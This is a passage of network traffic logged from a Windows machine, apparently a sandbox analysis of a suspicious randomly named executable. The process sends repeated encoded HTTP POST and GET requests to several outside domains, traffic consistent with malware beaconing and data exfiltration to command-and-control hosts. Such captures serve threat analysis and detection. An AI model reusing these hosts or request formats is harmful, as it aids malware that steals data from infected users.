                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje się żaden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]
                                                    Aug 5, 2024 15:32:24.597929001 CEST | 1200 | IN | Data Raw: 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 66 3a 68 6f 76 65 72 2c 20 2e 66 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 32 30 32 30 32 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d
                                                    Data Ascii: n:none;}.f:hover, .f:active{color:#202020;text-decoration:underline;}</style></head><body><div style="text-align:center;"><a href="https://dhosting.pl" rel="nofollow"><img src="https://dhosting.pl/img/logo.svg" alt="dho


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.4 | 55415 | 3.33.130.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:29.634285927 CEST | 712 | OUT | POST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 6c 34 64 67 64 45 39 43 72 5a 64 30 4b 6f 6a 44 79 79 78 53 67 73 51 48 49 41 4c 6c 4c 5a 79 73 2b 78 6f 47 65 61 6b 4d 35 56 65 2b 75 50 59 64 51 54 67 4b 48 79 41 41 63 6a 71 69 43 4f 52 63 62 61 68 49 77 64 45 7a 30 4e 64 53 76 72 37 4f 36 4e 44 53 43 6f 54 58 6d 39 72 41 70 73 76 34 79 36 75 42 65 61 52 65 32 6a 77 7a 46 6f 78 67 6f 71 57 4a 6e 37 36 78 59 33 38 48 30 58 51 6a 68 5a 66 53 2f 71 6c 4a 42 53 4b 39 46 56 43 31 33 72 65 35 57 38 4b 63 42 54 6a 44 6b 57 44 66 65 5a 62 70 2f 72 73 6d 73 71 45 46 78 50 6f 50 32 4d 53 63 67 3d 3d
                                                    Data Ascii: efM=QWuY90GonuIzDl4dgdE9CrZd0KojDyyxSgsQHIALlLZys+xoGeakM5Ve+uPYdQTgKHyAAcjqiCORcbahIwdEz0NdSvr7O6NDSCoTXm9rApsv4y6uBeaRe2jwzFoxgoqWJn76xY38H0XQjhZfS/qlJBSK9FVC13re5W8KcBTjDkWDfeZbp/rsmsqEFxPoP2MScg==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.4 | 55416 | 3.33.130.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:32.178124905 CEST | 732 | OUT | POST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 39 79 74 63 5a 6f 48 62 75 6b 50 35 56 65 71 2b 4f 51 41 41 54 72 4b 48 2b 2b 41 65 6e 71 69 43 61 52 63 65 6d 68 4a 48 70 4c 7a 6b 4e 62 59 2f 72 35 41 61 4e 44 53 43 6f 54 58 6e 59 4f 41 71 63 76 34 48 79 75 48 2f 61 53 41 6d 6a 7a 30 46 6f 78 6b 6f 71 61 4a 6e 36 70 78 5a 62 61 48 32 76 51 6a 68 4a 66 56 74 53 6d 44 42 53 4d 69 56 55 75 30 46 2f 58 35 7a 64 67 55 79 72 30 4d 31 53 76 65 59 49 42 34 4f 4b 37 30 73 4f 33 59 32 47 63 43 31 78 62 48 74 35 6b 68 78 30 68 45 64 4d 59 32 39 58 59 34 52 74 73 6d 6a 49 3d
                                                    Data Ascii: efM=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY9ytcZoHbukP5Veq+OQAATrKH++AenqiCaRcemhJHpLzkNbY/r5AaNDSCoTXnYOAqcv4HyuH/aSAmjz0FoxkoqaJn6pxZbaH2vQjhJfVtSmDBSMiVUu0F/X5zdgUyr0M1SveYIB4OK70sO3Y2GcC1xbHt5khx0hEdMY29XY4RtsmjI=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.4 | 55417 | 3.33.130.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:34.709495068 CEST | 10814 | OUT | POST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 31 79 73 76 68 6f 47 34 32 6b 4f 35 56 65 32 4f 4f 52 41 41 54 79 4b 45 4f 36 41 65 37 36 69 48 65 52 63 37 71 68 63 46 42 4c 34 6b 4e 62 57 76 72 38 4f 36 4e 57 53 44 45 58 58 6d 6f 4f 41 71 63 76 34 41 43 75 48 75 61 53 43 6d 6a 77 7a 46 6f 48 67 6f 72 50 4a 6e 69 35 78 5a 66 73 47 47 50 51 6a 46 56 66 51 59 2b 6d 65 52 53 4f 68 56 55 32 30 46 69 50 35 33 31 47 55 7a 66 53 4d 31 6d 76 64 74 70 61 6f 73 57 76 32 50 66 78 61 46 71 64 4e 43 4e 5a 50 64 31 7a 69 6a 45 41 54 73 51 57 36 50 61 49 2f 77 4e 36 77 32 54 50 2f 43 6f 69 4c 34 6b 32 4a 65 52 30 72 6d 71 6c 69 72 46 46 6e 6a 45 65 74 46 45 63 38 31 73 34 47 6e 64 4b 62 74 6e 41 36 4a 52 77 66 5a 4f 58 49 47 33 36 47 2b 30 69 76 6e 65 75 32 30 2f 38 64 7a 66 66 51 56 77 41 50 46 75 6c 6b 63 6e 65 51 44 51 58 42 70 72 51 33 6d 79 44 6f 59 78 6e 67 4d 62 66 79 51 6b 6d 6c 73 46 57 2b 33 4f 37 6c 4f 46 2b 58 69 [TRUNCATED]
                                                    Data Ascii: efM=[TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.4 | 55418 | 3.33.130.190 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:37.237335920 CEST | 440 | OUT | GET /7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:38.673557043 CEST | 393 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:38 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 66 4d 3d 64 55 47 34 2b 44 44 64 70 2f 73 6a 44 6c 6f 58 78 73 31 31 62 4b 64 6a 70 66 45 39 4b 54 4b 32 58 69 4d 69 4f 5a 6b 44 34 34 46 53 6a 4c 31 42 55 4a 43 30 42 37 5a 62 39 70 43 6d 65 43 66 56 58 6b 6d 41 46 76 50 50 6f 67 47 52 52 6f 69 76 4b 56 68 4c 7a 32 34 36 53 2b 44 52 4c 70 78 53 62 6d 6f 69 54 43 46 30 4f 4a 67 45 34 54 33 2f 4a 76 2b 31 63 32 6b 3d 26 47 54 50 3d 75 68 71 70 6a 78 49 50 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.4 | 55419 | 64.226.69.42 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:43.708153963 CEST | 700 | OUT | POST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 31 44 62 42 62 42 4e 31 47 4e 44 72 62 35 59 55 6f 7a 31 38 56 56 67 42 4d 64 70 45 2b 5a 65 67 42 49 46 4a 4b 4a 47 64 58 46 65 6b 42 6f 6a 30 51 79 33 74 36 47 33 62 32 4c 48 52 6f 43 71 72 2f 47 36 52 6b 6d 63 73 52 30 5a 4a 4d 73 66 36 37 48 52 57 30 75 51 32 55 61 54 79 67 77 32 49 37 54 39 4f 6a 35 33 4d 76 4e 55 76 45 64 69 7a 63 4f 2f 56 6a 58 68 67 36 43 2f 2b 41 74 67 57 30 42 31 58 5a 63 4f 6a 75 61 5a 56 35 31 38 63 52 74 58 68 71 54 77 33 6d 4b 70 69 5a 70 56 55 6e 45 6e 44 6c 2b 30 76 63 59 6f 7a 30 72 4e 76 52 59 38 56 43 77 3d 3d
                                                    Data Ascii: efM=9pMmvcz73uDu1DbBbBN1GNDrb5YUoz18VVgBMdpE+ZegBIFJKJGdXFekBoj0Qy3t6G3b2LHRoCqr/G6RkmcsR0ZJMsf67HRW0uQ2UaTygw2I7T9Oj53MvNUvEdizcO/VjXhg6C/+AtgW0B1XZcOjuaZV518cRtXhqTw3mKpiZpVUnEnDl+0vcYoz0rNvRY8VCw==
                                                    Aug 5, 2024 15:32:44.347558975 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:44 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: (chunked, gzip-compressed body, not printable; bytes are in Data Raw above)


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.4 | 55420 | 64.226.69.42 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:46.237900972 CEST | 720 | OUT | POST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 32 67 43 70 31 4a 4c 49 47 64 57 46 65 6b 50 49 6a 37 4e 69 33 6b 36 47 37 6c 32 4b 37 52 6f 43 2b 72 2f 45 79 52 6b 52 49 72 58 6b 5a 48 55 63 66 34 31 6e 52 57 30 75 51 32 55 61 57 5a 67 77 65 49 34 6a 74 4f 68 59 33 54 6a 74 55 73 44 64 69 7a 4e 65 2f 4a 6a 58 68 57 36 44 69 70 41 76 6f 57 30 42 6c 58 59 4a 69 73 6b 61 5a 54 30 56 39 54 62 4f 2b 4e 7a 7a 45 2f 6c 61 39 53 63 39 56 54 69 43 32 5a 30 50 56 34 4f 59 4d 41 70 73 45 62 63 62 42 63 5a 31 33 4b 59 7a 70 74 4c 2f 55 37 42 69 5a 6f 76 59 70 34 46 77 49 3d
                                                    Data Ascii: efM=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/q2gCp1JLIGdWFekPIj7Ni3k6G7l2K7RoC+r/EyRkRIrXkZHUcf41nRW0uQ2UaWZgweI4jtOhY3TjtUsDdizNe/JjXhW6DipAvoW0BlXYJiskaZT0V9TbO+NzzE/la9Sc9VTiC2Z0PV4OYMApsEbcbBcZ13KYzptL/U7BiZovYp4FwI=
                                                    Aug 5, 2024 15:32:46.883445024 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: (chunked, gzip-compressed body, not printable; bytes are in Data Raw above)


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.4 | 55421 | 64.226.69.42 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:48.770221949 CEST | 10802 | OUT | POST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 75 67 42 61 74 4a 4b 72 75 64 56 46 65 6b 52 59 69 38 4e 69 32 6b 36 47 6a 68 32 4b 32 6d 6f 41 47 72 2b 6e 71 52 73 46 6b 72 65 6b 5a 48 49 73 66 37 37 48 52 44 30 75 41 36 55 62 6d 5a 67 77 65 49 34 6c 52 4f 79 70 33 54 6c 74 55 76 45 64 69 2f 63 4f 2f 31 6a 58 4a 47 36 44 6e 55 41 37 63 57 7a 67 56 58 65 37 61 73 73 61 5a 52 31 56 38 4d 62 4f 69 53 7a 7a 5a 45 6c 61 4a 72 63 36 6c 54 67 7a 4b 42 6a 4e 4a 44 55 61 55 47 72 65 67 49 62 72 38 61 58 55 44 6f 51 52 52 51 52 73 51 57 63 7a 6f 51 38 5a 4a 35 62 6e 59 76 6b 36 36 6c 6f 49 55 5a 79 50 69 6f 33 6e 6e 53 65 75 64 5a 42 63 61 37 45 2b 33 74 69 4c 61 34 57 67 62 76 4b 6f 2f 51 30 74 61 50 30 55 72 50 6c 66 7a 72 4b 57 6c 58 43 6d 4a 56 6e 47 49 79 43 74 49 35 35 51 33 58 34 35 46 4b 43 7a 79 35 4b 4e 48 4b 6b 71 36 76 39 69 49 7a 59 74 72 75 34 50 6a 51 59 59 61 57 41 7a 52 4c 58 35 79 47 58 6f 58 33 46 63 [TRUNCATED]
                                                    Data Ascii: efM=[TRUNCATED]
                                                    Aug 5, 2024 15:32:49.398022890 CEST | 361 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:49 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.4 | 55422 | 64.226.69.42 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:51.302417040 CEST | 436 | OUT | GET /rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:51.922563076 CEST | 699 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 552
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.4 | 55423 | 203.161.55.102 | 80 | 2056 | C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Aug 5, 2024 15:32:57.138952017 CEST | 706 | OUT | POST /irn0/ HTTP/1.1
                                                    Host: www.slushcafe.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.slushcafe.top
                                                    Referer: http://www.slushcafe.top/irn0/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 6d 6d 4d 56 31 78 53 46 71 68 59 47 39 57 36 57 4d 4c 6a 61 62 38 2b 48 69 58 32 66 55 58 48 50 49 42 4c 47 2b 51 6a 57 47 58 6d 45 68 50 4a 2b 55 66 35 71 32 52 70 6f 38 59 53 72 76 78 55 52 43 4c 56 31 33 67 76 59 41 57 75 39 56 7a 73 46 64 68 68 66 64 64 4c 6e 43 58 6b 46 50 75 6f 5a 32 45 6d 75 63 4a 46 33 63 59 73 77 48 62 46 6d 50 58 56 49 45 67 5a 52 62 33 54 6f 37 67 43 67 45 66 65 38 78 62 69 71 42 55 6e 50 4b 77 2f 4a 75 63 37 55 6d 38 52 6b 46 77 54 43 39 4e 2b 55 4d 4a 41 56 38 52 69 70 76 70 58 74 4c 6f 59 39 68 6e 76 5a 35 67 30 42 34 49 74 61 72 54 57 4e 4e 67 3d 3d
                                                    Data Ascii: efM=mmMV1xSFqhYG9W6WMLjab8+HiX2fUXHPIBLG+QjWGXmEhPJ+Uf5q2Rpo8YSrvxURCLV13gvYAWu9VzsFdhhfddLnCXkFPuoZ2EmucJF3cYswHbFmPXVIEgZRb3To7gCgEfe8xbiqBUnPKw/Juc7Um8RkFwTC9N+UMJAV8RipvpXtLoY9hnvZ5g0B4ItarTWNNg==
                                                    Aug 5, 2024 15:32:57.775000095 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 05 Aug 2024 13:32:57 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
